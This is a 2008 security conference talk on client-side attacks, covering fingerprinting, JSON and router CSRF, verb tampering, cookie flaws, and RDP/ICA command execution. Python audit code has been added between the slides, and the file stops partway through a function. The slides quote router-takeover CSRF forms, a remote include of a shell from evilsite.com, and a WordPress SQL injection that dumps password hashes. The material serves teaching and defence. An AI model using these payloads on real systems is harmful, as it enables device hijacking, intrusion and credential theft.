Hacking Client Side Insecurities
       Club-Hack 2008




            Aditya K Sood
      Founder, Sec-Niche Security
$whoami
   Research Front:
   • Founder, SECNICHE Security.
   • Independent Security Researcher.
   • Lead IS Author and Reviewer for Hakin9 Organization.
   • Research Author for USENIX and ELSEVIER Journals.
   • Likes to do Bug Hunting. Released Advisories to Forefront Companies.
   • Active Speaker at Security Conferences.
     [EU-Sec-West, XCON [07/08], XKungFoo[08], OWASP, Cert-IN etc.]
   • Team Lead – Evil Fingers Community.
   • Projects – CERA, MLABS etc.

   Professional Front:
   Works as a Security Advisor / Penetration Tester for KPMG Consultancy.



Web 2.0 Application Model




$ AGENDA
   [1] Discovering Clients on Internet / Intranet.
       Web Proxy Auto Discovery Protocol.
       Fingerprinting Embedded Devices.
       Rogue Requests for HTTP Server Fingerprinting.
       JavaScript Based Client Information Retrieval.
   [2] Client Side Attack Patterns.
       Pluggable Protocol Handlers.
       JavaScript Jacking -> JSON Injections [CSRF].
       HTTP Verb Jacking -> HTTP Verb Tampering.
       Insecure Parametric Design of Cookies -> Baking with XSS.
       War XHR and IFRAME Exploiting Patterns.
       Cross Site Request Forging (Embedded Devices) -> The High Risk.
       Surf Jacking -> Jacking HTTPS in Traffic Pool.
   [3] Web Virtual Environment [RDP / CITRIX].
   [4] Questions and Answers.



Client Side ! Why?
   • User Interface with the Browsers to Access Content Remotely.
   • Client System Stores Sensitive Information as Local Cache.
   • Scripting – an Intermediate Model of the Client-Server Relation.
   • No Executables Required, Just Manipulation through Scripts.
   • Follows the Concept of Spoofing and Hidden Code.
   • Exploitable through JS-Jacking and VBS-Jacking with a Number of Attacks.
   • Browsers – The Bull's Eye, the Attacker's Prime Target.
   • The Concept – Exploitation On the Fly.
   • Exploitation Trend is Changing towards the Application.
   • Application Level Attacks are Easy to Trigger and Execute.




Discovery




Fingerprinting ! Why?
   • Discovering Clients Leverages a Lot of Sensitive Information.
   • Network and System Configuration is the Target Point to Attack.
   • The Internet and Search Engines Like Google Project a Plethora of Information.
   • Attacking an Intranet Requires Inside Information of the Party.
   • Garbage Dumps on World Wide Web Servers – A Huge Bonus for Attackers.
   • Client Side Supports Various [Weak] Protocols for Robust Functionality.
   • Insecure Administration of Servers – Configuration Mismanagement.
   • Browser Based Insecurities.
   • JavaScript Jacking on Client Browsers Reveals State Information of Clients.
   • Every Single Element Discovered Favors the Attack on the Client.




Fingerprinting !
    Web Proxy Auto Discovery Protocol.

   • Protocol Used to Discover the Network Proxy Automatically.
   • The Configuration File Inherently Contains Intranet Addresses.
   • The Protocol Replaces Manual Configuration: the Browser Locates the Proxy Auto-Config (PAC) File Itself.
   • WPAD Works on DHCP Behavior. [DHCPINFORM Query]
   • No DNS Lookup is Required if the DHCP Server Answers the Query.
   • Protocol Handler -> http://wpad.xxxx.com
   • PAC -> Proxy Auto Configuration | Proxy Settings for Subnets.
   • DHCP Query -> Returns the Uniform Resource Locator [URL] of the PAC File.
   • DNS Query -> wpad.dat, File Located in the WPAD Root Directory.
   • Function -> FindProxyForURL()



Fingerprinting !
    Web Proxy Auto Discovery Protocol.
   • Attack Points ->
   • wpad.dat is Not Stored in a Secure Manner. It has to be Placed in the Default
     Virtual Directory.
   • Browsers are Strict about Requesting wpad.dat from the Root Directory.
   • No Referrer Check on the Request to the wpad.dat File.
   • wpad.dat -> When a Request is Issued it Redirects the Browser to the Required
     Proxy File for its Configuration.
                    Malicious Redirection Can be Done.
   • When a DHCP Request is Issued, no DNS is Required. WOW ! No DNS Cache
     Poisoning is Required.
                    A Rogue DHCP Server on the LAN Does the Trick.
   • WPAD Uses JavaScript (the PAC File) to Set the Browser's Proxy Settings.



Fingerprinting !
    Web Proxy Auto Discovery Protocol.

   # WPAD definition (ISC dhcpd syntax)
   option wpad code 252 = text;
   # Suppress WPAD activity - no cache, no DNS.
   option wpad "\n000";
   # Configure a valid WPAD cache. The \n is required for Windows.
   # All config below this line is optional.
   #option wpad "http://www.example.com/wpad.pac\n";
   class "MSFT" {
       match if substring(option vendor-class-identifier, 0, 4) = "MSFT";
       # They put 252 on the DHCPINFORM's, but not on the DHCPREQUEST's
       # PRL. So we over-ride the PRL to include 252 = 0xFC, which will also
       # suppress the DHCPINFORMS!
       option dhcp-parameter-request-list =
           concat(option dhcp-parameter-request-list, fc);
   }

   # Minimal PAC file: the function the browser calls for every URL.
   function FindProxyForURL(url, host)
   {
       return "PROXY 192.168.0.1:3128; DIRECT";
   }


Fingerprinting !
    Embedded Devices

   • Critical for Determining the Internal Structure.
   • HTTP Request Parameters are Manipulated.
   • A 301 Moved Permanently Response Code is Thrown.
   • Devices are Used to Spoof the Internal IP Addresses.
   • Every Device has its Own Working Approach.
   • Each Sets Cookies in a Different Manner.
   • Each Changes the HTTP Header Parameters in its Own Way.
   • Analyzing the Changes in HTTP Headers Plays the Trick.
   • Necessary for Application Pen Testing at the Infrastructure Level.




Fingerprinting !
    Embedded Devices | HTTP Header Manipulation
   Case 1:
   Response Check 1                                   Potentially a NetScaler Device

   HTTP/1.1 200 OK\r\n
   Date: Tue, 05 Jul 2007 17:05:18 GMT\r\n
   Server: Server\r\n
   Vary: Accept-Encoding,User-Agent\r\n
   Content-Type: text/html; charset=ISO-8859-1\r\n
   nnCoection: close\r\n
   Transfer-Encoding: chunked\r\n

   Response Check 2

   send: 'GET /?Action=DescribeImages&AWSAccessKeyId=0CZQCKRS3J69PZ6QQQR2&Owner.1=084307701560&SignatureVersion=1&Timestamp=2007-02-15T17%3A30%3A13&Version=2007-01-03&Signature=<signature removed> HTTP/1.1\r\nHost: ec2.amazonaws.com:443\r\nAccept-Encoding: identity\r\n\r\n'
   reply: 'HTTP/1.1 200 OK\r\n'
   header: Server: Apache-Coyote/1.1
   header: Transfer-Encoding: chunked
   header: Date: Thu, 15 Feb 2007 17:30:13 GMT

   send: 'GET /?Action=ModifyImageAttribute&Attribute=launchPermission&AWSAccessKeyId=0CZQCKRS3J69PZ6QQQR2&ImageId=ami-00b95c69&OperationType=add&SignatureVersion=1&Timestamp=2007-02-15T17%3A30%3A14&UserGroup.1=all&Version=2007-01-03&Signature=<signature removed> HTTP/1.1\r\nHost: ec2.amazonaws.com:443\r\nAccept-Encoding: identity\r\n\r\n'
   reply: 'HTTP/1.1 400 Bad Request\r\n'
   header: Server: Apache-Coyote/1.1
   header: Transfer-Encoding: chunked
   header: Date: Thu, 15 Feb 2007 17:30:14 GMT
   header: nnCoection: close




Fingerprinting !
    Embedded Devices | HTTP Header Manipulation
   Case 2:

   HTTP/1.1 200 OK
   Date: Tue, 10 July 2007 03:01:36 GMT
   Server: Apache
   Connection: close
   Content-type: text/plain

   HTTP/1.0 404 Not Found\r\n                         RADWARE Device
   Xontent-Length: \r\n
   Server: thttpd/2.25b 29dec2003\r\n
   Content-Type: text/html; charset=iso-8859-1\r\n
   Last-Modified: Tue, 05 Jul 2007 17:01:12 GMT\r\n
   Accept-Ranges: bytes\r\n
   Cache-Control: no-cache, no-store\r\n
   Date: Tue, 05 Jun 2007 17:01:12 GMT\r\n
   Content-Length: 329\r\n
   Connection: close\r\n

   The Content parameter is transformed into XONTENT. This is generally shown by
   potential RADWARE devices.

Fingerprinting !
    Embedded Devices | Big IP4 IP Based Session Management
    Response Check 1

   Cookie: service-http=167880896.12345.0000.
   ASPSESSIONIDSSCATCAT=XXXXXXXXXXXXXXXXXXX

   Let's dissect the pattern of this number.

   Converting to Binary:
   Binary(cookie) == 00001010000000011010100011000000

   Splitting into 4 Blocks of 8 Bits and Converting each to Decimal to see what is there ->
   00001010               10
   00000001               1
   10101000               168
   11000000               192

   The Internal IP Dissected is -> 192.168.1.10 (the four bytes are read in reverse order).
   This Layout is Specific to Working Devices.
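The header artefacts from Case 1 and Case 2 and the cookie arithmetic above can be automated for auditing what your own edge devices leak. The following Python is an added example, not code from the talk: the sample responses are constructed from the slides, the `Xontent-` rule follows the slide's Radware claim, and the BIG-IP port decoding follows F5's documented byte-swapped encoding (the slide only decodes the IP).

```python
import re
import struct
from typing import Dict, List, Tuple

# Constructed samples, modelled on the responses shown on the slides.
NETSCALER_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 05 Jul 2007 17:05:18 GMT\r\n"
    "Server: Server\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "nnCoection: close\r\n"
    "Transfer-Encoding: chunked\r\n\r\n"
)
RADWARE_RESPONSE = (
    "HTTP/1.0 404 Not Found\r\n"
    "Xontent-Length: \r\n"
    "Server: thttpd/2.25b 29dec2003\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "Content-Length: 329\r\n"
    "Connection: close\r\n\r\n"
)
BIGIP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: service-http=167880896.12345.0000; path=/\r\n"
    "Set-Cookie: ASPSESSIONIDSSCATCAT=XXXXXXXXXXXXXXXXXXX; path=/\r\n\r\n"
)

BIGIP_VALUE = re.compile(r"^(\d{1,10})\.(\d{1,5})\.0000$")


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into the status line and (name, value) pairs.
    Accepts CRLF or bare LF and stops at the first empty line."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def decode_bigip_cookie(value: str) -> Tuple[str, int]:
    """Decode 'ip.port.0000': the IP is a 32-bit little-endian integer and the
    port is a 16-bit integer with its two bytes swapped (F5's encoding)."""
    ip_int, port_int, _ = value.split(".")
    ip = ".".join(str(b) for b in struct.pack("<I", int(ip_int)))
    port = struct.unpack("<H", struct.pack(">H", int(port_int)))[0]
    return ip, port


def audit(raw: str) -> Dict[str, List[str]]:
    """Return findings keyed by device family for one raw HTTP response."""
    _, headers = parse_headers(raw)
    findings: Dict[str, List[str]] = {}
    for name, value in headers:
        lname = name.lower()
        # NetScaler scrambles 'Connection' (e.g. 'nnCoection', 'Cneonction') so
        # downstream proxies ignore it: same letters, wrong order.
        if lname != "connection" and sorted(lname) == sorted("connection"):
            findings.setdefault("netscaler", []).append(f"scrambled header '{name}'")
        # The slides attribute 'Xontent-...' in place of 'Content-...' to Radware.
        if lname.startswith("xontent-"):
            findings.setdefault("radware", []).append(f"rewritten header '{name}'")
        # BIG-IP persistence cookies encode the pool member behind the VIP.
        if lname in ("set-cookie", "cookie"):
            for part in value.split(";"):
                cname, sep, cval = part.strip().partition("=")
                if sep and BIGIP_VALUE.match(cval):
                    ip, port = decode_bigip_cookie(cval)
                    findings.setdefault("bigip", []).append(
                        f"cookie {cname} leaks {ip}:{port}")
    return findings
```

An empty result for a response means none of the three artefacts is present; a non-empty one tells you which device family is answering and, for BIG-IP, which internal address the cookie exposes.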




Fingerprinting !
    HTTP Servers -> Fingerprinting with Rogue Requests

   • Fingerprinting HTTP Servers with Rogue Requests.
   • Web Servers React Stringently to Different Requests.
   • The Response Code can be Used to Analyze the Web Server.
   • 80% of such Request-Response Checks are Successful.




Fingerprinting !
   • Client Side JavaScript Can Leverage a Lot of Information about Browser State.

   Platform    : Win32
   OSCPU       : undefined
   UserAgent   : Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
   Language    : en-US
   AppName     : Netscape
   AppVersion  : 5.0 (Windows; en-US)
   Product     : Gecko
   ProductSub  : 2008092417
   Vendor      :
   VendorSub   :
   AppCodeName : Mozilla
   History     : 3
   ScreenW     : 1440
   ScreenH     : 900

   <script language="javascript">
   // Collect navigator, screen and history properties into a form text box.
   function browserInfo(form) {
       var txtInfo;
       txtInfo = "Platform : " + window.navigator.platform + "\n"
           // the original listing read the misspelt property 'oscpus',
           // which is why OSCPU shows 'undefined' above
           + "OSCPU : " + window.navigator.oscpu + "\n"
           + "UserAgent : " + window.navigator.userAgent + "\n"
           + "Language : " + window.navigator.language + "\n"
           + "AppName : " + window.navigator.appName + "\n"
           + "AppVersion : " + window.navigator.appVersion + "\n"
           + "Product : " + window.navigator.product + "\n"
           + "ProductSub : " + window.navigator.productSub + "\n"
           + "Vendor : " + window.navigator.vendor + "\n"
           + "VendorSub : " + window.navigator.vendorSub + "\n"
           + "AppCodeName : " + window.navigator.appCodeName + "\n"
           + "History : " + window.history.length + "\n"
           + "ScreenW : " + window.screen.width + "\n"
           + "ScreenH : " + window.screen.height;
       form.txtOutput.value = txtInfo;
       return;
   }
   </script>


Demonstrations!




Web Chemistry! Wow!




Client Side Exploiting Patterns
        • Pluggable Protocol Handlers.
        • JavaScript Jacking -> JSON Injections [CSRF].
        • HTTP Verb Jacking -> HTTP Verb Tampering.
        • Insecure Parametric Design of Cookies -> Baking with XSS.
        • War XHR and IFRAME Exploiting Patterns.
        • Cross Site Request Forging through CSS Parameter.
        • Cross Site Request Forging (Embedded Devices) -> The High Risk.
        • Surf Jacking -> Jacking HTTPS in Traffic Pool.



Pluggable Protocol Handlers
  • Attack Works with XSS etc. Vulnerabilities.
  • Browsers Support the Application Handlers.
  • Third Party Attack Base.

  GOOGLE CHROME Browser Support ->

  "protocol_handler": {
     "excluded_schemes": {
       "afp": true,
       "data": true,
       "disk": true,
       "disks": true,
       "file": true,
       "hcp": true,
       "javascript": true,
       "mailto": false,
       "ms-help": true,
       "news": false,
       "nntp": true,
       "shell": true,
       "snews": false,
       "vbscript": true,
       "view-source": true,
       "vnd": {
         "ms": {
            "radio": true
         }
       }
     }
  }




Java Script Jacking
       • JavaScript – The Most Critical and Most Used Scripting Entity.
       • Irrevocably Supported by Every Browser.
       • Active Base for Malicious Web Based Content.
       • Helps in Diversified Client Side Hacking from the Core.
       • Dynamically Generated Object Malfunctioning.
       • JS-Jacking -> Leveraging System Specific Information.
       • Attackers Can Query Browser Related Information.
       • Active Encoding Attacks Fused with JavaScript.
       • DOM Based Calling Pattern for Web Based Attacks.

                                               Websites Require
                                               JavaScript Support. This
                                               anatomy works in both a
                                               positive and a negative
                                               manner.


Java Script Jacking




Java Script Jacking – JSON Injections
    JSON Injections -> The Serialization Insecurity | Web 2.0
    Direct Injections with Encoding.
    Everything is Treated as a String. Apply toJSONObject().
    CSRF -> A Different Way to Fuse an Attack with Notation Objects.

    {
        "menu": {
            "id": "<img src=\"https://books.example.com/clickbuy?book=ISBNhere&quantity=100\">",
            "value": "<img src=\"https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y\">",
            "popup": "<script src=\"https://www.google.com/accounts/UpdateEmail?service=adsense&Email=mymail@newmail.net&Passwd=cool&save=\"></script>"
        }
    }

    Cross Site Request Forgery Structured in JSON – Google AdSense Layout.

HTTP Verb Jacking
    • HTTP -> Stateless Protocol. Every Request is Independent of the Others.
    • HTTP Supports a Number of Request Methods.
    • HTTP Verb Jacking -> Play with HTTP Request Methods like GET/POST.
    • Attack Affects -> Applications Handling XML Data. Versatile Attack.
    • The Request Schema is Defined in the web.xml File.
    • HTTP Request Functionality is Placed in the web.xml File.
    • Verb Jacking == Verb Tampering.
    • Has Existed for a Long Period of Time.
    • HTTP 1.0 and HTTP 1.1 Both Play a Part.

           Major Flaw -> The HTTP End Point Check does not
           Distinguish between HTTP Request Methods. Only the
           Parameter Check is Performed. All Verbs are Allowed.

    In 2006, I released a paper called Rogue XML Specifications which lists the
    potential insecurities in the web.xml file.
    http://packetstormsecurity.org/papers/general/RogueXMLSpecific.pdf




HTTP Verb Jacking
    The snapshot of the web.xml file: a security constraint for a certain target.
    The security-constraint parameter defines the allowed requests, and the
    login-config defines the type of authentication allowed.

        <security-constraint>
            <web-resource-collection>
                <web-resource-name>drivers</web-resource-name>
                <description>
                    Security constraint for drivers page
                </description>
                <url-pattern>/drivers.html</url-pattern>
                <http-method>POST</http-method>
                <http-method>GET</http-method>
            </web-resource-collection>
            <auth-constraint>
                <description>
                    constraint for drivers
                </description>
                <role-name>manager</role-name>
            </auth-constraint>
        </security-constraint>

        <login-config>
            <auth-method>BASIC</auth-method>
        </login-config>

        <security-role>
            <role-name>manager</role-name>
        </security-role>

    HTTP Verb Jacking -> Manager directories will not be accessed by GET/POST
    requests. What about a HEAD request?

    J2EE, JSP, ASP, ASP.NET, PHP etc. are based on configuration files to process
    the type of request to handle. [GET/POST/HEAD etc.]
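The web.xml weakness above, a constraint that enumerates GET and POST and so leaves HEAD and every other verb unconstrained, can be checked mechanically. The following Python is an added example, not from the talk or any project: it parses a web.xml, reports the verbs that bypass each auth-constraint, and shows the hardened form (no `<http-method>` elements, so the constraint covers every verb); it also honours the later Servlet `<http-method-omission>` and `<deny-uncovered-http-methods/>` elements.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Sequence

ALL_VERBS = ("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE")

# Constructed from the web.xml snapshot on the slide: only GET and POST to
# /drivers.html require the 'manager' role, so HEAD (and the rest) do not.
VULNERABLE_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>drivers</web-resource-name>
      <url-pattern>/drivers.html</url-pattern>
      <http-method>POST</http-method>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>manager</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method></login-config>
  <security-role><role-name>manager</role-name></security-role>
</web-app>"""

# Hardened form: no <http-method> at all, so the constraint covers every verb.
HARDENED_WEB_XML = (VULNERABLE_WEB_XML
                    .replace("<http-method>POST</http-method>", "")
                    .replace("<http-method>GET</http-method>", ""))


def _local(tag: str) -> str:
    """Drop a namespace such as '{http://java.sun.com/xml/ns/j2ee}'."""
    return tag.rsplit("}", 1)[-1]


def _children(elem: ET.Element, name: str) -> List[ET.Element]:
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem: ET.Element, name: str) -> List[str]:
    return [(c.text or "").strip() for c in _children(elem, name)]


def uncovered_verbs(web_xml: str, verbs: Sequence[str] = ALL_VERBS) -> Dict[str, List[str]]:
    """Map each url-pattern guarded by an auth-constraint to the verbs that
    bypass it. Assumes one constraint per pattern (the common case)."""
    root = ET.fromstring(web_xml)
    if _children(root, "deny-uncovered-http-methods"):
        return {}  # Servlet 3.1: the container rejects uncovered verbs itself
    result: Dict[str, List[str]] = {}
    for sc in _children(root, "security-constraint"):
        if not _children(sc, "auth-constraint"):
            continue  # no role requirement, nothing to bypass
        for wrc in _children(sc, "web-resource-collection"):
            listed = {m.upper() for m in _texts(wrc, "http-method")}
            omitted = {m.upper() for m in _texts(wrc, "http-method-omission")}
            if listed:
                covered = listed                 # only these verbs are constrained
            elif omitted:
                covered = set(verbs) - omitted   # Servlet 3.0: all but these
            else:
                covered = set(verbs)             # no method element: every verb
            missing = [v for v in verbs if v not in covered]
            for pattern in _texts(wrc, "url-pattern"):
                if missing:
                    result[pattern] = missing
    return result
```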

Insecure Parametric Cookies
    • Insecure Use of Cookies in Session Management.
    • Where is the Security State? The Majority Fails to Instantiate it.
    • XSS Drags in the Application. Authenticated Cookies can be Taken Over.
    • The Real Cause -> Insecure Design of Cookies with Parameters.

    Cookie Security Parameter Check:
    Cookie Security Design is Judged by two Major Factors:
        1. Cookie over a Secure Channel [HTTPS].
        2. Cookie Extraction through JavaScript Calls.

    Cookie Security Parameters are:
        Secure (boolean)   -> Allowed over HTTPS Only.
        HttpOnly (boolean) -> JavaScript document.cookie Fails.




XHR and IFRAME
    • XHR -> XML HTTP DOM Based API for XML Data Transfer.
    • Active Mechanism Based on AJAX.
    • XHR Requests are Not Cached in the Browser History.
    • IFRAME Requests have a Proper History Caching Layout.
    • XHR Requests are Irreversible. IFRAME is Totally the Reverse.
    • The Working Functionality of the two is Different from Each Other.
    • A Number of Client Side Attacks are Exploited by Using these Elements.

        If your browser does not support Ajax XHR requests and a page is loaded into
        the browser, then most of the remote toolkits use a hidden iframe to provide fake
        XHR support to the page.




XHR and IFRAME
          Local DoS [Milw0rm] – Winget 3.0 DoS Exploit PoC (XHR):

          <script>
          var oRequest = new XMLHttpRequest();
          var sURL = "http://www.snapdrive.net/files/571814/chrome.txt";
          alert('Downloading a txt file..please wait.');
          oRequest.open("GET", sURL, false);
          oRequest.setRequestHeader("User-Agent", navigator.userAgent);
          oRequest.send(null);
          xmlDoc = oRequest.responseText;
          alert(xmlDoc);
          if (oRequest.status == 200)
          {
              alert('Done...now try editing the Text-Box!');
              var str = " Winget 3.0 DoS Exploit PoC.Minimize Winget & Right-Click & Copy to clipboard.";
              document.write(str.link("http://" + oRequest.responseText + ".exe"));
          }
          else
          {
              alert('Error executing XMLHttpRequest call!');
          }
          </script>

          Konqueror 3.5.5 Crash [Milw0rm] (IFRAME):

          var iframe = document.createElement("IFRAME");
          iframe.setAttribute("src", 'ftp://localhost/anything');
          iframe.setAttribute("name", 'myiframe');
          iframe.setAttribute("id", 'myiframe');
          iframe.setAttribute("onload", 'read_iframe("myiframe")');
          iframe.style.width = "100px";
          iframe.style.height = "100px";
          document.body.appendChild(iframe);

          [PHP Nuke IFRAME]
          http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm

          [Word Press SQL Injection through IFRAME]
          wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--

          http://www.milw0rm.com/exploits/6777
          http://www.milw0rm.com/exploits/3512
Embedded Devices - CSRF
         [1] Cisco Router Remote Administration Execution CSRF Exploit [Milw0rm]

         <html>
         <body onload="fdsa.submit();">
         <form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">
             <input type=hidden name=command value="alias exec xx xx">
             <input type=hidden name=command_url value="/level/15/exec/-">
             <input type=hidden name=new_command_url value="/level/15/configure/-">
         </form>
         </body>
         </html>

         [2] A-Link WL54AP3 and WL54AP2 CSRF [Milw0rm]

         <html>
         <body onload="document.wan.submit(); document.password.submit()">
         <form action="http://192.168.1.254/goform/formWanTcpipSetup" method="post" name="wan">
             <input type="hidden" value="dnsManual" name="dnsMode" checked>
             <input type="hidden" name="dns1" value="216.239.32.10">
             <input type="hidden" name="dns2" value="216.239.32.10">
             <input type="hidden" name="dns3" value="216.239.32.10">
             <input type="hidden" name="webWanAccess" value="ON" checked="checked">
         </form>
         <form action="http://192.168.1.254/goform/formPasswordSetup" method="post" name="password">
             <input type="hidden" name="username" value="mallory">
             <input type="hidden" name="newpass" value="gotroot">
             <input type="hidden" name="confpass" value="gotroot">
         </form>
         </body>
         </html>

         [3] EXPLAY CMS CSRF Exploit

         <img src="http://explay.localhost/admin.php?name=users&page=1&order=user_id&set_admin=2" />




SURF Jacking – HTTPS at Stake
     • Vulnerable Play with HTTPS Websites.
     • Surf Jacking [HTTPS] is an Outcome of Side Jacking [HTTP].
     • The Basic Flaw is in the Cookie Setting by the Respective Servers.
     • All Websites with Insecure Cookies are at Risk.

                                                                   Side Jacking was
                                                                   discovered by Errata
                                                                   Security.

                                                                   Surf Jacking was
                                                                   discovered by Enable
                                                                   Security.

                                                                   But Cookie Insecurity
                                                                   has been known for a long time.

                                                                   Greets for breaking it
                                                                   down into Attacks.
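The two cookie parameters from the Insecure Parametric Cookies slide are exactly what decides whether Surf Jacking works: a cookie set over HTTPS without the Secure flag is also attached to a plain-HTTP request to the same host, which is what the attack redirects the victim into. The following Python is an added example, not from the talk; the Set-Cookie headers are constructed, and it audits them and builds the Cookie header a browser would send over each scheme.

```python
from typing import Dict, List

# Constructed Set-Cookie headers as an HTTPS site might send them.
SAMPLE_SET_COOKIES = [
    "SESSIONID=abc123; Path=/; HttpOnly",           # no Secure flag
    "AUTH=deadbeef; Path=/; Secure; HttpOnly",      # both flags set
    "PREF=lang=en; Path=/",                         # neither flag
]


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Parse one Set-Cookie value into its name, value and the two flags."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() or True  # bare flag -> True
    return {
        "name": name.strip(),
        "value": value.strip(),
        "secure": "secure" in attrs,
        "httponly": "httponly" in attrs,
    }


def audit_cookies(headers: List[str]) -> Dict[str, List[str]]:
    """Report, per cookie, which of the two parameters the slide names is missing."""
    findings: Dict[str, List[str]] = {}
    for header in headers:
        cookie = parse_set_cookie(header)
        problems = []
        if not cookie["secure"]:
            problems.append("missing Secure: also sent over plain HTTP (Surf Jacking)")
        if not cookie["httponly"]:
            problems.append("missing HttpOnly: readable via document.cookie (XSS)")
        if problems:
            findings[str(cookie["name"])] = problems
    return findings


def cookie_header_for(headers: List[str], scheme: str) -> str:
    """Build the Cookie request header a browser would send to the same host
    over the given scheme. Cookies without Secure go over http as well, so
    a forced http:// redirect exposes them to anyone on the network path."""
    sent = []
    for header in headers:
        cookie = parse_set_cookie(header)
        if scheme == "https" or not cookie["secure"]:
            sent.append(f'{cookie["name"]}={cookie["value"]}')
    return "; ".join(sent)
```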




Demonstrations!




RDP / ICA – Command Execution
    • Virtual Environment for Clients to Produce an Interface with Servers.
    • Executing Commands and GUI Operations Generically.
    • ICA -> Independent Computing Architecture, CITRIX Applications.
    • RDP -> Remote Desktop Protocol, Microsoft Proprietary Protocol.
    • Basically, Virtual Desktop Working Functionality.
    • The Protocols Defined have Different Working Behavior for ICA and RDP.
    • Application (RDP) -> MTS i.e. Microsoft Terminal Services.
    • Clients Exist for Almost all Platforms [*Nix, Windows etc.].
    • ICA -> Similar to X Window System / XEN Virtual Environment.
    • RDP Client -> RDC + TSC
          RDC -> Remote Desktop Connection.
          TSC -> Terminal Services Connection.




RDP / ICA
    Citrix Web ICA File: Webica.ini

    • Trusted and Un-trusted Distinction -> Client Modeling Check.
    • It depicts the trusted behavior of the ICA Client from its Origin Point using the
      webica.ini file.
    • Trusted (ICA Client) -> Program Neighborhood / PN Agent.
    • Un-Trusted (ICA Client) -> Web Interface / Direct ICA File Execution.

     Structured Dependency on the webica.ini file. It is used to set Access Rights.

    Citrix Application Server File: Appsrv.ini

    • Custom ICA Connections are defined in it.
    • Information about Entries in the Remote Connection Manager.




Attack Point - ICA
        Citrix Desktop Connection parameters provide a facility to feed a specific
        command which will get executed when a connection is initiated to the server
        by the client. Usually the command gets executed instead of the desktop.

        [ApplicationServers]
        Desktop=

        [Desktop]
        TransportDriver=TCP/IP
        BrowserProtocol=UDP
        DesiredHRES=4294967295
        DesiredVRES=4294967295
        ScreenPercent=0
        DoNotUseDefaultCSL=Off
        Description=Desktop
        Address=citrix.msdsb.net
        InitialProgram=#ROGUE or MALICIOUS COMMAND
        IconPath=M:\Program Files\Citrix\ICA Client\pn.exe
        IconIndex=1
        ConnectType=1
        MaximumCompression=Off
        UseAlternateAddress=0
        Compress=On

Hacking Client Side Insecurities
Attack Point - RDP
        Microsoft Terminal Services RDP has inbuilt option of executing
             command through shell directly which is a possible attack
                                 point of Infection.
    screen mode id:i:1
    desktopwidth:i:800
    desktopheight:i:600
    session bpp:i:16
    winposstr:s:0,3,0,0,800,572
    full address:s:www.intlogistics.com
    alternate shell:s: Malicious or rogue Command
    compression:i:1
    keyboardhook:i:2
    audiomode:i:0
    redirectdrives:i:0
    redirectprinters:i:1
    redirectcomports:i:0
    redirectsmartcards:i:1
    displayconnectionbar:i:1
    autoreconnection enabled:i:1
    username:s:freight
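As an added example (not code from the deck, nor from Citrix or Microsoft), the following Python triages the two file types the ICA and RDP slides describe, for instance before a mailed or downloaded connection file reaches a user. It parses the name:type:value lines of an .rdp file and the INI sections of an .ica file or Appsrv.ini, flags alternate shell (and the RemoteApp program keys) and InitialProgram, distinguishes a "#"-prefixed published-application name from a raw command line, and also reports the redirect* switches that hand client drives, clipboard or smart cards to the remote host. The embedded sample files are constructed; their host names and paths are placeholders.

```python
"""Triage .rdp and .ica / Appsrv.ini files for client-supplied "run this
program" settings and for client-resource redirection (added example; the
sample files below are constructed placeholders)."""
import configparser
import sys
from dataclasses import dataclass

# .rdp settings whose value is a program or command line the remote host
# executes inside the session (alternate shell is the one on the slide).
RDP_EXEC_KEYS = {
    "alternate shell": "program started as the session shell instead of the desktop",
    "remoteapplicationprogram": "RemoteApp program started on connection",
    "remoteapplicationcmdline": "arguments passed to the RemoteApp program",
}
# .rdp settings that hand a client resource to the remote host when set to 1.
RDP_REDIRECT_KEYS = ("redirectclipboard", "redirectcomports", "redirectdrives",
                     "redirectprinters", "redirectsmartcards")


@dataclass
class Finding:
    kind: str      # "rdp" or "ica"
    section: str   # ICA section name, "" for .rdp
    key: str
    value: str
    severity: str  # "high", "medium" or "info"
    reason: str


def parse_rdp(text):
    """Parse 'name:type:value' lines into {name: (type, value)}. Values may
    contain ':' themselves (full address:s:host:port), so split at most twice."""
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) != 3 or parts[1].strip().lower() not in ("i", "s", "b"):
            continue  # blank or malformed line
        name, typ, value = (p.strip() for p in parts)
        settings[name.lower()] = (typ.lower(), value)
    return settings


def audit_rdp(text):
    settings = parse_rdp(text)
    findings = []
    for key, reason in RDP_EXEC_KEYS.items():
        _typ, value = settings.get(key, ("s", ""))
        if value:
            findings.append(Finding("rdp", "", key, value, "high", reason))
    for key in RDP_REDIRECT_KEYS:
        typ, value = settings.get(key, ("i", "0"))
        if typ == "i" and value == "1":
            findings.append(Finding("rdp", "", key, value, "medium",
                                    "client resource redirected to the remote host"))
    return findings


def parse_ica(text):
    """ICA files and Appsrv.ini are plain INI: one [section] per connection.
    Only '=' is a delimiter, so values such as TCP/IP or host:port stay intact."""
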